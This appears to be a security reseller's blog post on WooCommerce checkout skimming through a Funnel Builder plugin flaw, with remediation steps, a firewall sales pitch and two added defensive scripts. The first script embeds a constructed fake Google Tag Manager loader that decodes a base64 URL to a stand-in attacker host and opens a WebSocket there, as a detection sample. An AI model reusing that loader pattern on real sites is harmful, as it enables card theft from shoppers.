WooCommerce checkout skimming has quietly become one of the most damaging threats facing online stores in 2026 — and a freshly exploited WordPress plugin flaw has just dropped more than 40,000 shops directly into the firing line. If you sell anything through WordPress, attackers could already be copying your customers’ credit card details on every single sale, and you would see no error, no warning, and no sign that anything is wrong.
This guide explains exactly how the attack works, how to check whether your store is exposed, and the seven steps you need to take today.
What Is WooCommerce Checkout Skimming?
WooCommerce checkout skimming is an attack in which criminals inject malicious JavaScript into your store’s checkout page. That code runs in the shopper’s browser: as your customer fills in their name, card number, CVV and billing address, it reads those values out of the form (on each keystroke, when a field loses focus, or when the Place Order button is clicked) and sends them to a server the attacker controls. Nothing on your own server ever sees that copy leave.
The dangerous part is how invisible it is. The customer’s order still goes through normally. Your dashboard looks fine. No plugin throws an error. Meanwhile, every card processed on your store is being harvested and later sold on dark-web carding markets. Security researchers call this style of digital card theft a Magecart attack, and it has been growing fast because it targets the one page where money and trust meet: the checkout.
For a store owner, the fallout is severe — fraudulent chargebacks, PCI compliance penalties, a damaged brand, and the very real risk of Google flagging your domain as “deceptive,” which wipes out organic traffic overnight.
The Funnel Builder Flaw Behind the Latest Attacks
The current wave of attacks is being driven by a critical security flaw in Funnel Builder by FunnelKit, a popular WordPress plugin installed on more than 40,000 WooCommerce stores. Shop owners use it to customise checkout pages, build landing pages, and add one-click upsells.
The vulnerability affects every version of the plugin released before 3.15.0.3. What makes it especially dangerous is that it is unauthenticated: an attacker needs no login, no password and no account to exploit it. The plugin exposed a public checkout endpoint that did not check user permissions properly. Attackers could send a crafted request that wrote their own data straight into the plugin’s global “External Scripts” setting, and whatever sits in that setting is printed onto every checkout page on the store. Because that setting lives in the WordPress database rather than in a plugin file, updating the plugin closes the endpoint but does not remove a snippet an attacker has already planted there.
The flaw was discovered by Dutch e-commerce security firm Sansec, which confirmed it is being actively exploited in the wild. You can read their full technical breakdown in the Sansec FunnelKit vulnerability research and the reporting by BleepingComputer on the Funnel Builder skimmer campaign.
The Fake Google Tag Manager Disguise
Here is the clever trick that helps this attack stay hidden. Instead of injecting obvious malicious code, attackers dress their skimmer up as a harmless-looking Google Tag Manager or Google Analytics script. The fake snippet sits right next to a store’s genuine marketing tags, and most owners — and even some developers — skim straight past anything that looks like a familiar tracking tag.
That fake script hides a second-stage URL inside a base64 string. When the checkout page loads in the shopper’s browser, it decodes the address, pulls in an external script, and opens a WebSocket connection to the attacker’s command-and-control server. From there a custom-built payment skimmer is delivered, tailored to that specific storefront. It is camouflage, and it works.
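As an added example (not code from the article, from Sansec or from FunnelKit), the script below triages inline `<script>` blocks copied out of a checkout page’s source for the disguise described above. It flags any inline snippet that decodes a base64 literal into a URL on a non-Google host, calls `atob()` at runtime, or opens a WebSocket, and records whether the snippet presents itself as a Google tag. The genuine GTM loader passes clean; the look-alike is built the way the article describes. Both snippets and the host `tags.example.invalid` are constructed for the example.

```javascript
// Added example for this article, not code from the page, Sansec or FunnelKit.
// Heuristic triage of inline <script> blocks from a checkout page: flags snippets
// that decode a base64 literal into a URL on a non-Google host, call atob(), or
// open a WebSocket. Sample snippets are constructed; tags.example.invalid stands
// in for an attacker's second-stage host.

const GOOGLE_HOSTS = new Set(['www.googletagmanager.com', 'www.google-analytics.com']);

// The genuine GTM loader: plain-text URL, no decoding, no sockets.
const GENUINE_GTM_SCRIPT = `<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');</script>`;

// A look-alike (constructed): a "Google Tag Manager" comment, a base64-hidden
// loader URL, and a WebSocket to the same made-up host.
const HIDDEN_URL = Buffer.from('https://tags.example.invalid/gtm.js').toString('base64');
const FAKE_GTM_SCRIPT = `<script>// Google Tag Manager
(function(){var s=document.createElement('script');s.src=atob('${HIDDEN_URL}');
document.head.appendChild(s);var ws=new WebSocket('wss://tags.example.invalid/ws');})();
</script>`;

// Constructed checkout page: genuine tag, a src-only script, and the fake tag.
const SAMPLE_CHECKOUT_HTML = `<html><head>${GENUINE_GTM_SCRIPT}
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
${FAKE_GTM_SCRIPT}</head><body><form id="checkout"></form></body></html>`;

// Bodies of <script> tags that have no src attribute.
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1])) out.push(m[2]);
  }
  return out;
}

// Quoted base64-looking literals (16+ chars) that decode to a URL.
function decodedUrls(script) {
  const urls = [];
  const re = /['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g;
  let m;
  while ((m = re.exec(script)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    const hit = text.match(/\b(?:https?|wss?):\/\/[^\s'"<>]+/);
    if (hit) urls.push(hit[0]);
  }
  return urls;
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// One finding per suspicious inline script: its position among inline scripts,
// whether it dresses itself up as a Google tag, and why it was flagged.
function triageInlineScripts(html) {
  const findings = [];
  extractInlineScripts(html).forEach((script, index) => {
    const looksLikeGoogleTag =
      /google\s*tag\s*manager|googletagmanager|gtag\(|dataLayer|google-analytics/i.test(script);
    const reasons = [];
    for (const url of decodedUrls(script)) {
      const host = hostOf(url);
      if (host && !GOOGLE_HOSTS.has(host)) reasons.push(`base64-hidden URL to ${host}`);
    }
    if (/\batob\s*\(/.test(script)) reasons.push('decodes base64 at runtime (atob)');
    if (/\bnew\s+WebSocket\s*\(/.test(script)) reasons.push('opens a WebSocket');
    if (reasons.length) findings.push({ index, looksLikeGoogleTag, reasons });
  });
  return findings;
}

console.log(JSON.stringify(triageInlineScripts(SAMPLE_CHECKOUT_HTML), null, 2));
```

Run it against the saved source of your own checkout page (and against the contents of the External Scripts setting) by replacing `SAMPLE_CHECKOUT_HTML`. A hit is a lead, not proof: decode the flagged literal yourself and confirm where the host actually points before deleting anything.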
Is Your WooCommerce Store at Risk?
Run through this quick check:
- You run WordPress + WooCommerce. That is the target platform.
- You have the Funnel Builder plugin installed. Check Plugins in your WordPress dashboard.
- Your Funnel Builder version is below 3.15.0.3. Reporting suggests over half of active installs are still on vulnerable versions.
If all three are true, treat this as an active incident, not a future risk. And even if you do not use Funnel Builder, the lesson still applies — checkout skimming through vulnerable plugins is a pattern, not a one-off, so the steps below are worth doing regardless.
7 Steps to Stop WooCommerce Checkout Skimming Right Now
- Update Funnel Builder immediately. Go to your WordPress dashboard and update the plugin to version 3.15.0.3 or later. The official patch is available on the Funnel Builder plugin page on WordPress.org. This is the single most important step.
- Audit your External Scripts setting. Open the plugin’s Settings → Checkout → External Scripts (and any other script or header/footer code fields). Copy the current contents somewhere safe so you can investigate later, then remove anything you do not personally recognise, especially “analytics” or “Tag Manager” snippets you never added yourself.
- Scan your entire store for skimmers and backdoors. Updating the plugin stops new injections, but it does not remove code that is already there. Use a malware scanner such as eComscan, Wordfence or Sucuri to find hidden skimmers, backdoors and modified files. Keep in mind that a scanner that only checks files on disk will not see a snippet stored in a plugin setting, which is why the setting itself has to be reviewed by hand.
- Rotate every secret. Change all admin passwords, regenerate your WordPress security salts, and rotate API keys and payment gateway credentials. Assume anything an attacker could have touched is compromised.
- Inspect your live checkout page. Viewing the page source shows you what is printed into the page, not where it connects. Open your browser’s developer tools on the real checkout page, switch to the Network tab, and walk through an actual checkout up to the payment step, because some skimmers only activate once the card fields are present. Note every domain that scripts are loaded from and every fetch, XHR or WebSocket target. Anything that is not your own domain, your payment gateway or a tag you deliberately added needs an explanation. A skimmer always has to “phone home” somewhere.
- Check for unauthorised changes. Review your list of admin users for accounts you did not create, and look at recently modified files (including wp-content/uploads and mu-plugins, two common hiding places for backdoors) for anything suspicious.
- Harden your network perimeter, and the checkout page itself. A web application firewall in front of the site can block the crafted requests that exploit flaws like this one, and outbound filtering can stop a backdoor on your server from calling out. Be clear about what it cannot do, though: the skimmer runs in the shopper’s browser and sends card data from there straight to the attacker, so no firewall at your store’s edge ever sees that traffic. The browser-side control is a Content-Security-Policy header on the checkout page that limits script-src and connect-src to the hosts you expect, so an unexpected loader or WebSocket is blocked and reported instead of silently allowed.
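The following is an added example, not code from the article or from any vendor, covering the inspection step and the page-hardening step above in one piece. It checks a list of requests of the kind you would read off the DevTools Network tab against an allow-list of hosts the checkout page is expected to talk to, then builds a Content-Security-Policy for that page from the same allow-list. The store name `shop.example`, the assumption that the store uses Stripe.js plus Google Tag Manager/Analytics, the `/csp-report` path and the captured requests (including the skimmer host `tags.example.invalid`) are all constructed for the example; substitute your own gateway and tag hosts.

```javascript
// Added example for this article, not code from the page or from any vendor.
// Audits what a checkout page talks to against an allow-list, then builds a
// Content-Security-Policy for that page. ALLOWED_HOSTS assumes a store at
// shop.example using Stripe.js plus Google Tag Manager / Analytics; CAPTURED is
// a constructed list of requests as read off the DevTools Network tab, with
// tags.example.invalid as a made-up skimmer host.

const ALLOWED_HOSTS = {
  script: ['shop.example', 'js.stripe.com', 'www.googletagmanager.com', 'www.google-analytics.com'],
  connect: ['shop.example', 'api.stripe.com', 'www.google-analytics.com'],
  frame: ['js.stripe.com', 'hooks.stripe.com'],
};

const CAPTURED = [
  { type: 'script', url: 'https://shop.example/wp-includes/js/jquery/jquery.min.js' },
  { type: 'script', url: 'https://js.stripe.com/v3/' },
  { type: 'script', url: 'https://www.googletagmanager.com/gtm.js?id=GTM-XXXX' },
  { type: 'script', url: 'https://tags.example.invalid/gtm.js' },
  { type: 'connect', url: 'https://shop.example/?wc-ajax=checkout' },
  { type: 'connect', url: 'wss://tags.example.invalid/ws' },
  { type: 'frame', url: 'https://js.stripe.com/v3/elements-inner-card.html' },
];

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Entries whose host is not on the allow-list for their request type.
// An unparseable URL is reported too rather than silently passed.
function auditConnections(entries, allowed) {
  return entries.filter((e) => {
    const host = hostOf(e.url);
    const list = allowed[e.type] || [];
    return host === null || !list.includes(host);
  });
}

// CSP for the checkout page built from the allow-list. The report path is an
// assumption. Ship it as Content-Security-Policy-Report-Only first and enforce
// once the reports are clean. WordPress and WooCommerce print inline scripts,
// so script-src needs nonces or hashes (or 'unsafe-inline', which weakens it);
// even then, connect-src still stops exfiltration to a host that is not listed.
function buildCsp(allowed, reportPath = '/csp-report') {
  const https = (hosts) => hosts.map((h) => `https://${h}`).join(' ');
  const connect = allowed.connect.map((h) => `https://${h} wss://${h}`).join(' ');
  return [
    "default-src 'self'",
    `script-src 'self' ${https(allowed.script)}`,
    `connect-src 'self' ${connect}`,
    `frame-src ${https(allowed.frame)}`,
    "object-src 'none'",
    "base-uri 'self'",
    `report-uri ${reportPath}`,
  ].join('; ');
}

console.log('Unexpected connections:', auditConnections(CAPTURED, ALLOWED_HOSTS));
console.log('Content-Security-Policy-Report-Only: ' + buildCsp(ALLOWED_HOSTS));
```

Against the constructed capture, the audit returns only the two requests to `tags.example.invalid`. Under the generated policy, the fake tag’s `atob`-loaded script is refused by `script-src` and its WebSocket by `connect-src`, and the browser posts a violation report to the store, which is the earliest warning you will get that something on the checkout page is trying to reach a host you never approved.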
Why Updating Plugins Alone Isn’t Enough
Here is the uncomfortable truth: there will always be another vulnerable plugin. Funnel Builder today, something else next month. WordPress stores run dozens of third-party plugins, and every one of them is a potential entry point. Patching is essential, but patching is reactive — it only helps after a flaw is public.
Real protection comes from defence in depth: layering security so that one failed plugin does not equal one breached store. A business-grade network firewall sits in front of your infrastructure, inspects traffic, and blocks the server-side half of an attack like this one: the crafted exploit request against the vulnerable endpoint, a backdoor calling out from the server, or an admin login from a hostile network. Next-generation appliances from Fortinet’s FortiGate range and SonicWall’s TZ firewalls add intrusion prevention, SSL inspection and outbound threat filtering for exactly that traffic. What they cannot see is the skimmer’s own exfiltration, which travels from the shopper’s browser directly to the attacker; that side is covered by a Content-Security-Policy on the checkout page and regular audits of what the page loads.
If you want a complete picture of layered protection for a small business, our guide to the $500 small business network security setup walks through it step by step, and our breakdown of Zero Trust security for small business owners explains why “never trust, always verify” is the model that stops attacks like this from spreading.
Protect Your Store and Network with Jazz Cyber Shield
At Jazz Cyber Shield, we are a US-based, authorised reseller of enterprise security hardware — Fortinet, SonicWall, and WatchGuard firewalls included. If you are not sure which appliance fits your store and network, our team will help you choose the right one. Request a free quote or browse our full hardware range to start building a defence that does not depend on a single plugin staying safe.
Frequently Asked Questions
What is WooCommerce checkout skimming? It is an attack where malicious JavaScript is injected into a WooCommerce checkout page to silently steal customers’ credit card numbers, CVVs, and billing details as they are typed.
How do I know if my store has a skimmer? Run a dedicated malware scan, review your plugin script settings for unfamiliar code, and check your checkout page for connections to unknown external domains.
Does updating Funnel Builder remove an existing skimmer? No. Updating to version 3.15.0.3 closes the endpoint so new code cannot be injected, but a snippet already written into the External Scripts setting stays there until you remove it, and any other malware the attacker installed must still be found and removed with a security scan.
Can a firewall stop WooCommerce checkout skimming? Partly. A firewall or WAF cannot patch a plugin flaw, but it can block the exploit request against the vulnerable endpoint and stop a backdoored server from calling out. It cannot see the stolen card data, which goes from the shopper’s browser straight to the attacker; a Content-Security-Policy on the checkout page is the control for that.
Is WooCommerce safe to use? Yes, with care. WooCommerce core is actively maintained, and the risk almost always comes from outdated or vulnerable third-party plugins and themes, which is why timely updates, a locked-down checkout page and a hardened network perimeter matter so much.
Final Word
WooCommerce checkout skimming succeeds because it is silent. The single best thing you can do today is update Funnel Builder, clear the injected setting and scan your store, and stop treating plugin patches as your only line of defence. Layer your security, restrict what the checkout page is allowed to load, harden your network, and your store stays a place customers can trust.


